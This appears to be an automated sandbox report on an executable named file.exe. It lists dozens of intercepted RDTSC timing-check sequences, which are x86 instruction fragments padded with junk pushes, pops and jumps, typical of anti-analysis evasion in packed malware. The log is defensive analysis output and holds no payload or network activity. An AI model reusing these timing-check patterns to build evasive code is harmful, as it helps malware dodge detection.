                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3812 second address: FC3817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1C4F second address: FC1C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F0D second address: FC1F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F400072A726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F400072A72Dh 0x00000012 jng 00007F400072A726h 0x00000018 jmp 00007F400072A730h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F3F second address: FC1F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC209C second address: FC20A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2349 second address: FC2356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4000E20B66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2356 second address: FC235B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC235B second address: FC2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC248A second address: FC2497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnc 00007F400072A728h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2497 second address: FC249C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC249C second address: FC24CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F400072A72Eh 0x0000000b jmp 00007F400072A72Fh 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jng 00007F400072A728h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2747 second address: FC274B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC274B second address: FC275F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F400072A726h 0x00000008 jp 00007F400072A726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC275F second address: FC2765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3695 second address: FC36A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC36A0 second address: FC36A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC16BE second address: FC16C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC16C4 second address: FC16DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4000E20B73h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC16DE second address: FC16E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC16E4 second address: FC16F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4000E20B66h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBE05 second address: FCBE1B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F400072A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F400072A726h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBE1B second address: FCBE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBE1F second address: FCBE36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F400072A731h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBE36 second address: FCBE41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F4000E20B66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBE41 second address: FCBE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F400072A726h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBFC5 second address: FCBFD1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4000E20B6Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7F0E second address: FD7F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F400072A732h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7F2A second address: FD7F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7F30 second address: FD7F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDCCDD second address: FDCCE7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC850 second address: FDC854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC854 second address: FDC858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC858 second address: FDC888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F400072A72Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jc 00007F400072A726h 0x00000017 jno 00007F400072A726h 0x0000001d popad 0x0000001e jmp 00007F400072A72Ch 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0181 second address: FE0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0185 second address: FE018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0312 second address: FE032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4000E20B74h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE032A second address: FE0344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A72Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F400072A726h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1E42 second address: FE1E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4000E20B6Dh 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1E5F second address: FE1E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1E65 second address: FE1E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4000E20B68h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4000E20B79h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1E90 second address: FE1E96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF157 second address: FEF15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2C9D second address: FF2CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jbe 00007F400072A726h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF928A second address: FF9296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7D4C second address: FF7D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400072A72Bh 0x00000009 jmp 00007F400072A72Fh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7ED6 second address: FF7EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4000E20B6Ah 0x0000000b popad 0x0000000c jnp 00007F4000E20B8Bh 0x00000012 jo 00007F4000E20B6Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7EF4 second address: FF7EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7EFB second address: FF7F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8FEF second address: FF9004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A730h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9004 second address: FF9013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDFFC second address: FFE002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F05060 second address: F0507E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4000E20B78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0507E second address: F0508A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F400072A72Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019BCF second address: 1019BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B76h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C646 second address: 101C655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A72Ah 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C655 second address: 101C669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4000E20B70h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C669 second address: 101C674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030CCA second address: 1030CD4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4000E20B66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030CD4 second address: 1030CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030CDA second address: 1030CE6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4000E20B6Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E4C second address: 1030E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F400072A72Eh 0x0000000e jmp 00007F400072A738h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E7B second address: 1030E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E81 second address: 1030E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103112F second address: 1031136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031136 second address: 103113E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031552 second address: 1031567 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b js 00007F4000E20B66h 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103169F second address: 10316A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031969 second address: 103196E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103196E second address: 1031976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10375F2 second address: 1037600 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1037600 second address: 1037604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD027C second address: 4DD0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0280 second address: 4DD0292 instructions: 0x00000000 rdtsc 0x00000002 call 00007F400072A72Ah 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0292 second address: 4DD02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4000E20B6Fh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD02AA second address: 4DD02AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD02AF second address: 4DD02F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4000E20B75h 0x0000000a and eax, 355D4286h 0x00000010 jmp 00007F4000E20B71h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4000E20B6Dh 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD02F6 second address: 4DD02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD02FC second address: 4DD0300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0300 second address: 4DD0340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F400072A72Fh 0x0000000f pop ebp 0x00000010 pushad 0x00000011 mov eax, 4DF6BF2Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F400072A72Eh 0x0000001e add cl, FFFFFFB8h 0x00000021 jmp 00007F400072A72Bh 0x00000026 popfd 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4F360 second address: F4F364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4F502 second address: F4F53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A730h 0x00000009 popad 0x0000000a jmp 00007F400072A739h 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F400072A726h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD046C second address: 4DD0538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F4000E20B6Bh 0x0000000c and eax, 4BE3EECEh 0x00000012 jmp 00007F4000E20B79h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F4000E20B6Ch 0x00000023 sub si, 7748h 0x00000028 jmp 00007F4000E20B6Bh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F4000E20B78h 0x00000034 and si, 39A8h 0x00000039 jmp 00007F4000E20B6Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F4000E20B79h 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F4000E20B73h 0x00000050 jmp 00007F4000E20B73h 0x00000055 popfd 0x00000056 mov eax, 357AEC5Fh 0x0000005b popad 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD05E5 second address: 4DD05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F400072A72Ah 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD05F5 second address: 4DD0647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4000E20B6Eh 0x00000009 add ecx, 71AA5578h 0x0000000f jmp 00007F4000E20B6Bh 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F4000E20B72h 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4000E20B6Eh 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0647 second address: 4DD064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD064D second address: 4DD0672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4000E20B6Ch 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0672 second address: 4DD0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0678 second address: 4DD06A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F4000E20B6Eh 0x00000011 call 00007F4070E444BEh 0x00000016 push 74DF27D0h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov eax, dword ptr [esp+10h] 0x00000026 mov dword ptr [esp+10h], ebp 0x0000002a lea ebp, dword ptr [esp+10h] 0x0000002e sub esp, eax 0x00000030 push ebx 0x00000031 push esi 0x00000032 push edi 0x00000033 mov eax, dword ptr [74E80140h] 0x00000038 xor dword ptr [ebp-04h], eax 0x0000003b xor eax, ebp 0x0000003d push eax 0x0000003e mov dword ptr [ebp-18h], esp 0x00000041 push dword ptr [ebp-08h] 0x00000044 mov eax, dword ptr [ebp-04h] 0x00000047 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004e mov dword ptr [ebp-08h], eax 0x00000051 lea eax, dword ptr [ebp-10h] 0x00000054 mov dword ptr fs:[00000000h], eax 0x0000005a ret 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD06A5 second address: 4DD06A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD06A9 second address: 4DD06AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
